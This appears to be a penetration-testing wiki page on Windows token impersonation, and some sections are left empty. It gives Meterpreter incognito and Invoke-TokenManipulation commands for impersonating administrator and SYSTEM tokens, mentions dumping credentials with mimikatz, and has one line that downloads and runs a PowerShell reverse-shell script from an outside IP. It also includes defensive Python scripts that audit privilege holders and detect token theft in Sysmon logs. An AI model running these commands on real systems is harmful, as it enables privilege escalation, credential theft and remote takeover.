# Token Impersonation

Token impersonation is a technique through which a Windows local administrator can steal another user's security token in order to impersonate that user and effectively execute commands as them.

There are certain privileges in Windows that, if enabled, can let an attacker escalate privileges to SYSTEM or to any other user account with an active and valid token on that system, through various tools that have been designed specifically to exploit this.

## Exploitable Privileges

Certain privileges can be exploited either to escalate privileges directly to SYSTEM or to perform actions that are normally restricted. The privileges listed below can grant direct admin access when exploited:
| Privilege | Impact | Tool |
|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd party tool |
| SeImpersonate | Admin | 3rd party tool |
| SeBackupPrivilege | Admin | 3rd party tool |
| SeBackup | Threat | Built-in commands |
| SeCreateToken | Admin | 3rd party tool |
| SeDebug | Admin | PowerShell |
| SeLoadDriver | Admin | 3rd party tool |
| SeRestore | Admin | PowerShell |
| SeTakeOwnership | Admin | Built-in commands |
| SeTcb | Admin | 3rd party tool |

The full list is here:
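The defender's counterpart to the table is knowing which principals on a host actually hold these privileges. The script below is an added example (not from the original page): it parses the `[Privilege Rights]` section of a `secedit /export /cfg <file>` export and reports every holder of a table privilege that is outside an expected baseline. The export text is constructed for the example, the well-known SID names are the standard Windows ones, and the baseline is an assumption standing in for a per-host known-good export.

```python
"""Audit who holds the token-abuse privileges from the table above.

Added example, not part of the original page. Input is the [Privilege Rights]
section of a `secedit /export /cfg` export; the sample below is constructed.
"""

# Short names from the table mapped to the constant names Windows uses in
# secedit exports and in Security event logs.
TOKEN_ABUSE_PRIVILEGES = {
    "SeAssignPrimaryToken": "SeAssignPrimaryTokenPrivilege",
    "SeImpersonate": "SeImpersonatePrivilege",
    "SeBackup": "SeBackupPrivilege",
    "SeCreateToken": "SeCreateTokenPrivilege",
    "SeDebug": "SeDebugPrivilege",
    "SeLoadDriver": "SeLoadDriverPrivilege",
    "SeRestore": "SeRestorePrivilege",
    "SeTakeOwnership": "SeTakeOwnershipPrivilege",
    "SeTcb": "SeTcbPrivilege",
}

# Well-known SIDs that commonly appear as holders; anything else is printed raw.
WELL_KNOWN_SIDS = {
    "S-1-5-6": "NT AUTHORITY\\SERVICE",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}

# ASSUMPTION: baseline of expected holders on a stock member workstation.
# Build your own from a known-good export rather than trusting this table.
BASELINE = {
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
    "SeImpersonatePrivilege": {"S-1-5-6", "S-1-5-19", "S-1-5-20", "S-1-5-32-544"},
    "SeBackupPrivilege": {"S-1-5-32-544", "S-1-5-32-551"},
    "SeCreateTokenPrivilege": set(),
    "SeDebugPrivilege": {"S-1-5-32-544"},
    "SeLoadDriverPrivilege": {"S-1-5-32-544"},
    "SeRestorePrivilege": {"S-1-5-32-544", "S-1-5-32-551"},
    "SeTakeOwnershipPrivilege": {"S-1-5-32-544"},
    "SeTcbPrivilege": set(),
}

# Constructed export: a domain account (RID 1105) has been added to
# SeImpersonatePrivilege and the domain Administrator (RID 500) to SeDebugPrivilege.
SAMPLE_EXPORT = """[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-21-1111-2222-3333-1105
SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-1111-2222-3333-500
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
"""


def parse_privilege_rights(export_text):
    """Return {privilege_name: set_of_SIDs} from the [Privilege Rights] section."""
    rights = {}
    in_section = False
    for raw in export_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, holders = line.partition("=")
        # secedit prefixes SIDs with '*'; strip it so they match the baseline.
        sids = {h.strip().lstrip("*") for h in holders.split(",") if h.strip()}
        rights[name.strip()] = sids
    return rights


def find_unexpected_holders(rights, baseline=BASELINE):
    """For each table privilege, list holders that are not in the baseline."""
    findings = {}
    for full_name in TOKEN_ABUSE_PRIVILEGES.values():
        extra = rights.get(full_name, set()) - baseline.get(full_name, set())
        if extra:
            findings[full_name] = sorted(extra)
    return findings


def describe(sid):
    """Friendly name for well-known SIDs, the raw SID otherwise."""
    return WELL_KNOWN_SIDS.get(sid, sid)


if __name__ == "__main__":
    findings = find_unexpected_holders(parse_privilege_rights(SAMPLE_EXPORT))
    for priv, sids in findings.items():
        print(f"{priv}: unexpected holders -> {', '.join(describe(s) for s in sids)}")
```

Run it against a real export by replacing `SAMPLE_EXPORT` with the file contents; privileges that are absent from the export have no holders and produce no finding.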
## Using Metasploit

In your meterpreter shell, load the incognito module:

```
load incognito
```

List available tokens:

```
list_tokens -u
```

Impersonate Administrator:

```
impersonate_token megacorp\\administrator
```
## Invoke-TokenManipulation

Invokes token impersonation as a domain user. If this doesn't work, you can try impersonating SYSTEM and then dumping credentials using mimikatz.

```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"
```

As a replacement for the last command you could run the following, but be wary of special characters in the command such as `"` and `'`: inside a double-quoted PowerShell string an embedded double quote is escaped with a backtick (`` `" ``), not a backslash.

```powershell
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c `"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1')`""
```
## Other Techniques

## Mitigation & Detection
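Both the incognito and Invoke-TokenManipulation steps above have to open a handle to the process whose token they take (wininit.exe in the page's last command) before they can duplicate it, and Sysmon event ID 10 (ProcessAccess) records such opens with its SourceImage, TargetImage and GrantedAccess fields. The script below is an added example, not from the page or from either tool: it flags opens of SYSTEM-owned processes by non-allowlisted images that request the query access needed to read the process token. The event records are constructed to resemble Sysmon output, the access-mask constants are the Windows SDK values, and the allowlist of legitimate source images is an assumption to be tuned per environment.

```python
"""Flag process-handle opens that look like token theft from SYSTEM processes.

Added example, not part of the original page or of the tools it describes.
The records below are constructed to resemble Sysmon event ID 10; they are
not real telemetry.
"""

# Processes that run as SYSTEM and are the usual targets for token theft.
SYSTEM_TOKEN_SOURCES = {"wininit.exe", "lsass.exe", "winlogon.exe", "services.exe", "csrss.exe"}

# Process access-mask bits from the Windows SDK. Opening a process token
# requires one of the two query-information rights.
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_VM_READ = 0x0010

# ASSUMPTION: source images that legitimately touch SYSTEM processes in this
# environment. Derive the real list from a baseline of normal Sysmon data.
ALLOWED_SOURCES = {"csrss.exe", "lsass.exe", "svchost.exe", "msmpeng.exe", "wmiprvse.exe"}

# Constructed Sysmon ID 10 records using Sysmon's own field names.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-05-01 10:02:11.001",
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"UtcTime": "2024-05-01 10:05:42.317",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\wininit.exe", "GrantedAccess": "0x1400"},
    {"UtcTime": "2024-05-01 10:05:43.020",
     "SourceImage": r"C:\Users\alice\Downloads\update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"UtcTime": "2024-05-01 10:07:00.500",
     "SourceImage": r"C:\Program Files\Editor\editor.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1400"},
]


def basename(path):
    """Last path component, lower-cased; handles Windows paths on any host."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return a reason string if the event looks like token theft, else None."""
    target = basename(event["TargetImage"])
    source = basename(event["SourceImage"])
    access = int(event["GrantedAccess"], 16)
    if target not in SYSTEM_TOKEN_SOURCES or source in ALLOWED_SOURCES:
        return None
    if not access & (PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION):
        return None
    reason = f"{source} opened {target} with query access (0x{access:x})"
    # Read access to lsass memory points past token theft toward credential dumping.
    if access & PROCESS_VM_READ and target == "lsass.exe":
        reason += "; VM_READ on lsass also fits credential dumping"
    return reason


def find_suspicious(events):
    """Return (UtcTime, reason) for every event classify() flags, in input order."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason:
            hits.append((event["UtcTime"], reason))
    return hits


if __name__ == "__main__":
    for when, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"{when}  {reason}")
```

Run over real data by feeding `find_suspicious` the parsed EventData of Sysmon ID 10 records; the second sample event is the shape that the `Get-Process wininit | Invoke-TokenManipulation` step above would leave behind, and the allowlist is what keeps routine service-to-lsass opens out of the alert queue.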